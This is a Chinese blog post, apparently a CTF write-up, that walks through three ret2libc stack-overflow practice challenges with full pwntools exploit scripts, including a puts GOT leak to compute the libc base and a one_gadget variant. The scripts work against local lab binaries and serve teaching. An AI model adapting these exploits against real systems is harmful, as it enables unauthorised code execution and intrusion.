[pwn] 5.ROP-ret2libc

最新推荐文章于 2022-04-26 21:20:01 发布
最新推荐文章于 2022-04-26 21:20:01 发布
阅读量259 收藏 2
点赞数
分类专栏: CTF 文章标签: 系统安全 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42172261/article/details/119978941
版权

文章目录

题目ret2libc1

这里需要通过gets函数覆盖返回地址到system函数,并把/bin/sh作为system的参数。

由于是动态链接,所以需要把返回地址原本写system函数的地址改为system函数在plt表中的地址。

from pwn import *

elf = ELF("./ret2libc1")
sys_addr = elf.plt["system"]
bin_sh_addr = next(elf.search(b"/bin/sh"))

io = process("./ret2libc1")
io.recvline()
payload = b'a'*(108+4) + p32(sys_addr) + b'1111' + p32(bin_sh_addr)
io.sendline(payload)
io.interactive()

题目ret2libc2

相比于ret2libc1来说没有/bin/sh, 需要想到要往其中写入。这时就得想到.bss节可以写。
payload栈结构如下图。
在这里插入图片描述

from pwn import *

elf = ELF("ret2libc2")
sys_addr = elf.plt["system"]
gets_addr = 0x08048460
buf_addr = 0x0804a080

io = process("./ret2libc2")
io.recvuntil("What do you think ?")
payload = b'a'*(108+4) + p32(gets_addr) + \
		p32(sys_addr) + p32(buf_addr) + p32(buf_addr)
io.sendline(payload)
io.sendline(b'/bin/sh')
io.interactive()

或者通过pop、ret方法平衡栈
在这里插入图片描述

from pwn import *

elf = ELF("ret2libc2")
sys_addr = elf.plt["system"]
gets_addr = 0x08048460
buf_addr = 0x0804a080
pop_ebx_ret_addr = 0x0804872f

io = process("./ret2libc2")
io.recvuntil("What do you think ?")
payload = b'a'*(108+4) + p32(gets_addr) + \
	p32(pop_ebx_ret_addr) + p32(buf_addr) + \
	p32(sys_addr) + p32(1) + p32(buf_addr)
io.sendline(payload)
io.sendline(b'/bin/sh')
io.interactive()

题目ret2libc3

反编译代码
在这里插入图片描述
初始时main函数中的栈帧
在这里插入图片描述
调用printf_message函数中的strcpy函数时的栈帧
在这里插入图片描述
可以在第二个输入时构造payload,覆盖返回地址
在这里插入图片描述

通过内存泄漏,找到puts函数的真实地址
请添加图片描述
找到libc里system函数和puts函数地址差,从而得到system函数的地址
在这里插入图片描述

需要注意动态库每次装载时都会被装在到不同的地方,所以只能先获取system相对puts函数的偏移量。然后根据程序运行时得到的puts函数的真实地址得到system函数的真实地址。

通过pwndgb可以计算出第二次输入时需要覆盖的长度请添加图片描述
0xffffd010 - 0xffffd048 = -56,所以需要覆盖56+4=60个字节长度

system("/bin/sh")system("sh")都可以执行shell,所以这里在程序里找到一个以sh结尾的地址作为system的参数

但是最后打不通,后来发现是libc文件的问题
linux下的命令ldd是列出动态库的依赖关系,发现用的是/lib/i386-linux-gnu/libc.so.6

from pwn import *

elf = ELF("./ret2libc3")
libc = ELF("/lib/i386-linux-gnu/libc.so.6")
io = process("./ret2libc3")

io.sendlineafter(b'Give me an address (in dec) :', str(elf.got['puts']))
io.recvuntil(b'The content of the address : ')
libcBase = int(io.recvuntil(b'\n', drop=True), 16) - libc.symbols['puts']

sh_addr = next(elf.search(b'sh\x00'))
payload = flat(cyclic(60),libcBase+libc.symbols['system'], cyclic(4), sh_addr)
# cyclic(n)填充n字节的垃圾数据
io.sendlineafter(b'Leave some message for me :', payload)
io.interactive()

还有一个讨巧的方法,是用one_gadget来打,运气好的话可以打通
请添加图片描述
one_gadget是找libc文件中可以执行shell的程序的软件,每条语句都会有限制条件,如果满足限制条件的话才能打通。

payload = flat(cyclic(60),libcBase+libc.symbols['system'], cyclic(4), sh_addr)
改成
payload = flat(cyclic(60),libcBase+0x3a80c)
挨个地址试一试
H4ppyD0g
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
linux中ret2libc入门与实践
counsellor的专栏
08-23 6781
前言 本来想找一个windows下的栈溢出漏洞的poc作为漏洞分析路程的开篇,但是一路走来遇到了太多的问题,大大小小,什么都有。同时因为工作事情比较多,能拿出来调试和写文章的时间也是断断续续。昨天刚有一点心得,今天就忘了一大半,同时会推翻自己之前的结论。 经过漫长的求证过程,打算把NX利剑-ret2libc这种方法和其原理用简单直接的方式展示出来。 简介 DEP-数据执行保护(Data...
level3学习ret2libc
TedLau的博客
04-11 295
0x00 常规文件检查 是一个32位的开启了堆栈不可执行的ELF文件。 0x10 ida打开分析文件 ​ 在左侧的function处并没有发现system函数,但是有一个vulnerable_function, 打开main函数,f5反汇编后可以看到如下图所示的内容,即调用了vulnerable函数 打开vul函数可以发现它使用write函数先输出了一句话,于是我们可以尝试通过泄漏write函数的...
ret2libc-泄露和不需要泄露
qq_36918532的博客
04-18 245
ciscn_2019_c_1 —需要泄露got 题目可在buuctf下载 安全检查,发现只开了NX保护(DEP) 执行程序会发现,程序第二次原模原样输出了((这种菜单题,我还以为是堆)) IDA查看反汇编代码 加密函数 其中x在bss段定义,一直在增加,所以会导致上面的第二次执行的时候长度>s,从而不执行加密那块,这可以用来泄露地址 也就是后面会变的只有比上一次输入长的部分 操作如下图 由于get可以一直输入,达到一定长度报段错误,这应该是说明覆盖到返回地址了,所以猜想应该是只要覆盖了返回地
PWN学习】如何获取libc基址
Morphy_Amo的博客
12-09 7986
在解pwn题的时候,如果程序中没有可以获得shell的函数,通常会通过got表中调用函数来获取libc基址,然后通过libc获取要用的system函数和binsh字符。
Ret2Libc(2) (有system、无‘/bin/sh’)绕过NX、ASLR
X丶 的博客
11-21 2214
和Ret2Libc(1)一样,先把程序扔进IDA看看代码    和Ret2Libc(1)一样,gets存在溢出漏洞 gdb-peda$ checksec CANARY    : disabled FORTIFY   : disabled NX        : ENABLED PIE       : disabled RELRO     : Partial 可以看到程序开启了NX, 我的...
pwn题目中的libc-2.27.so文件
04-11
pwn题,有些时候题目不给这个文件,这里是这个库的文件。
pwn07.ret2syscall例题
11-11
ret2syscall例题
ret2libc2pwn 入门题
02-11
pwn 入门题
最新AWVS/Acunetix-v23.11.231123131-Linux
最新发布
01-16
新功能 添加了使用 API 端点从 CloneSystem 本身提取 PCI 报告的功能 为客户添加了为其 HashiCorp 集成定义命名空间的选项 增强的报告功能,在 .csv 导出中提供更...为 WordPress JupiterX 核心插件添加了新检查:CVE-2
0ctf-2017-pwn-char-libc.so
02-05
2017年0ctf的pwn题char的libc库文件
pwn基本ROP——ret2libc
turtlesd的博客
04-26 2291
ret2libc环境PLT表和GOT表ret2libc1原理漏洞分析使用checksec查看保护措施使用IDA32位进行调试获取偏移量payloadret2libc2原理漏洞分析checksec使用IDA进行调试payloadret2libc3原理漏洞分析checksec使用IDA调试payload 环境 retlibc1 ret2libc2 ret2libc3 PLT表和GOT表 在进行ret2libc学习之前,我们需要先了解一下PLT表与GOT表的内容。 Globle offset table(GOT)
Ret2Libc(1) (有system、/bin/sh)绕过NX、ASLR
X丶 的博客
11-21 1110
Ret2Libc即控制程序执行libc库中的函数。 通常是返回到某个函数的plt处,或者函数运行时候的实际地址。 下面是一个例子: 可以看出程序gets有一个明显的溢出漏洞 gdb-peda$ checksec CANARY    : disabled FORTIFY   : disabled NX        : ENABLED PIE       : disabled RELRO...
使用ret2libc攻击方法绕过数据执行保护
热门推荐
海枫的专栏
02-08 2万+
本文介绍ret2libc攻击方法,可以绕过栈执行保护安全机制
ret2libc中system的参数地址偏移量的找法
weixin_43085694的博客
03-31 809
如果已经拿到了libc文件,那么直接用 ROPgadget --binary ./libc.XXX --string /bin/sh 可以来找到/bin/sh字符的偏移量
linux的system函数返回值,关于libc中的system()函数的返回值
weixin_39924179的博客
05-10 466
先看一个简单的程序:#include #include int main(int argc, const char **argv) {int ret=0;ret=system("abc");//printf("%d",ret);return ret;}abc是一个不存在命令按我一直以来的理解,system()的返回值即为所执行命令的返回值打印了来的ret值为32512可是执行完这个c程序后,执行e...
Ret2libc
钞sir的博客
01-26 8811
三生三世十里桃花 她就像是一道疤 像风像雨像飞沙 像空气一样难抓 简介 ret2libc就是控制函数的执行libc中的函数,通常是返回至某个函数的 plt 处或者函数的具体位置 (即函数对应的 got 表项的内容)。一般情况下,我们会选择执行 system("/bin/sh"),因此我们通常需要找到 system 函数的地址 ret2libc通常可以分为下面这几类: 程序中自身就含有sys...
记一次ret2__libc_start_main某处循环利用程序
qq_39869547的博客
03-08 599
0x1 程序开启了pie,但是程序的ret是__libc_start_main+0x240.此时我们可以部分修改ret为__libc_start_main+0x210左右的位置. 使得程序重新回到main函数,达到重复利用的目的。 0x2 程序中用户输入不能是0x00,所以不能填写地址,不能用rop的方法调用system("/bin/sh")函数 那么我们只能填写ret为one_gadget.来g...
pwn ret2libc
清霂的博客
02-04 418
目录1.攻防世界 level32.buu babyrop3.buu ciscn_2019_c_1 1.攻防世界 level3 把文件放到kali里面发现是一个压缩包(放入exeinfo里面也可以发现是压缩包),解压缩得到level3和libc.so文件 file checksec ida32 进入漏洞函数vunl(),发现有栈溢出漏洞 没有system函数和/bin/sh 题目提示了用libclibc.so是一个函数库(类似于C语言#include<iostream>的iostrea
pwn基础之ctfwiki-栈溢出-基础ROP-ret2libc-3
qq_52658640的博客
04-23 1175
文章目录基础知识libc泄露原理利用方法ret2libc3挖掘漏洞利用漏洞利用脚本 基础知识 libc泄露 原理 当有一道题给了可执行文件文件,在ida分析中并不能找到system函数和binsh地址,这时我们就可以利用在栈溢出之前执行过的函数泄露libc的版本。因为libc函数相对于libc的基地址都是确定的,采用 got 表泄露,即输出某个函数对应的 got 表项的内容,所以就可以通过上述方法来获取libc函数中的system地址和字符binsh的地址。 system 函数属于 libc,而 libc
pwn ret2libc原理
08-22
pwn ret2libc是一种攻击技术,其原理是通过利用程序中的栈溢出漏洞,来控制程序的执行流程,以达到执行libc中的函数的目的。 在ret2libc攻击中,程序会调用libc库中的函数,例如system函数,来执行特定的操作。但是在程序中没有自带的/bin/sh字符串,所以需要通过其他方式获取执行shell命令的能力。 具体而言,攻击者会利用程序中的栈溢出漏洞,将栈上的返回地址修改为在libc库中的某个函数的地址,例如puts函数。然后通过执行puts函数,将栈上保存的函数地址打印出来。由于libc库中的函数地址相对位置是不变的,攻击者可以根据已知的函数地址和libc的版本来计算system函数的真实地址。然后再利用system函数执行特定的操作,比如执行shell命令。 总结来说,pwn ret2libc攻击的原理是通过栈溢出漏洞修改返回地址为libc库中的一个函数地址,然后根据已知的函数地址和libc的版本计算出system函数的真实地址,最终实现执行shell命令的目的。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [pwn学习——ret2libc2](https://blog.csdn.net/MrTreebook/article/details/121595367)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [pwn小白入门06--ret2libc](https://blog.csdn.net/weixin_45943522/article/details/120469196)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

H4ppyD0g

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值